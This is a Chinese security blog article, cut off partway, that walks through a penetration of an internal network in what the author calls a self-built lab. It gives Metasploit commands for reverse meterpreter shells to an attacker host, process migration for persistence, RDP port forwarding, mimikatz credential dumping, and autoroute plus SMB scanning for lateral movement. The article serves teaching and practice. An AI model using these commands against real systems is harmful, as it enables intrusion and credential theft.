专栏名称: 安全祖师爷
国内领先的互联网安全媒体,WEB安全爱好者们交流与分享安全技术的最佳平台!这里聚集了XSS牛、SQL牛、提权牛、WEB牛、开发牛、运维牛,公众号定期分享安全教程及相关工具。与其在别处仰望 不如在这里并肩!
目录
相关文章推荐
Python爱好者社区  ·  付费上班终于成为了现实。 ·  14 小时前  
贵州日报  ·  这笔钱别忘了领!明起预约→ ·  昨天  
百姓关注  ·  70城房价1月数据出炉!贵阳的是…… ·  2 天前  
Python开发者  ·  AI 正在培养一代 “文盲程序员” ·  3 天前  
51好读  ›  专栏  ›  安全祖师爷

【基础向】实战讲解内网渗透思路

安全祖师爷  · 公众号  ·  · 2019-12-31 14:30

正文

简介

本次测试为实战测试,测试环境是自己搭建的虚拟机中的一部分,敏感信息内容已做打码处理,仅供讨论学习。由于本人在内网方面的掌握也是属于新手阶段,运用到的一些 msf 攻击手法也很基础,请各位表哥多多指教。

获得shell

Getshell的过程没什么好说的,无非简单的后台弱口令到上传然后冰蝎连接getshell。
获得shell后,模拟终端 ping 8.8.8.8 有返回包,说明该服务器与外网互通。

既然跟外网互通,那么可以尝试直接使用msf的 exploit/multi/handler 配合冰蝎反弹shell来获得session

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost xxx.xxx.xxx.xxx
set lport 5665
run


但是结果很不尽人意,没能够成功获得session。
在使用冰蝎模拟终端收集信息过程中,发现本地有 powershell 进程。

再次打开 msf ,本次尝试使用 web_delivery 配合终端执行powershell指令来获得session。

User exploit/multi/script/web_delivery
Set targets 2
set payload windows/x64/meterpreter/reverse_https
set lhost xxx.xxx.xxx.xxx
set lport 4332
set srvport
run



获得payload,使用冰蝎或者C刀模拟终端直接执行,成功获得session,执行 getuid 发现权限为system权限,省去了提权过程。

权限维持

为了获得一个持久稳定的高权限session,我们需要将当前的session进程迁移到一个持久、坚挺又稳定的进程上,防止突然暴毙(咳咳)

我们使用ps查看当前进程,然后选中一个看起来比较持久的幸运儿spoolsv.exe(这是一个用来控制打印的进程,我遇到的机器基本都开启了此进程)
注意: 选择进程的时候优先选择系统进程,这种比较持久且为system权限

migrate 进程号
getpid

内网信息搜集

不管是在什么类型的渗透环境下,信息搜集永远是不可缺少的一环,他决定了你渗透的效率,可以让你在渗透过程中少走很多弯路,毕竟在项目上尤其是红蓝攻防中,最缺的永远是时间

接下来,查看IP信息以及arp缓存,查看网段分布情况:


发现该服务器只存在192.168.10.0/24网段的信息
于是继续查看其他信息

Netstat -ano

发现服务器开放3389端口:

既然开启了3389端口,我们使用端口转发,登录到服务器看看有没有意外收获。

portfwd add -l 6666 -p 3389 -r 127.0.0.1

IP有了,3389开了,现在我们缺少的是用户名密码
直接 meterpreter 下加载 mimikatz

Load mimikatz
Wdigest


比较遗憾的是没能获取到明文密码,但是我这边使用 cobalt strike 加载的 mimikatz 成功获取到明文密码
emmm总之搞不懂的地方先归为玄学问题

现在,密码也有了,mstsc链接目标3389端口成功 此处涉及的敏感信息较多,放弃截图,我尽量用语言表述清楚思路
上传 netpass 查看rdp缓存,无果,但是发现系统有 VNC

VNC: VNC (Virtual Network Console)是虚拟网络控制台的缩写,是一款远程控制工具软件。

查看VNC相关文件发现新的网段信息,但是没有保存的连接信息,不过能获得新的网段信息也是知足了

横向

至此,信息收集部分其实也就差不多,接下来我们开始尝试横向移动

根据之前发现的网段信息以及服务器本机的路由信息,我们手动添加路由

Run autoroute -s 192.168.10.0/24
Run autoroute -s 172.16.0.0/24
……

其他网段同理,添加路由之后 bg 退回到控制台
先使用 auxiliary/scanner/smb/smb_version 模块扫描一下各网段的 smb 服务开启情况

Use auxiliary/scanner/smb/smb_version
set rhosts 192.168.10.0/24
set threads 10
run







请到「今天看啥」查看全文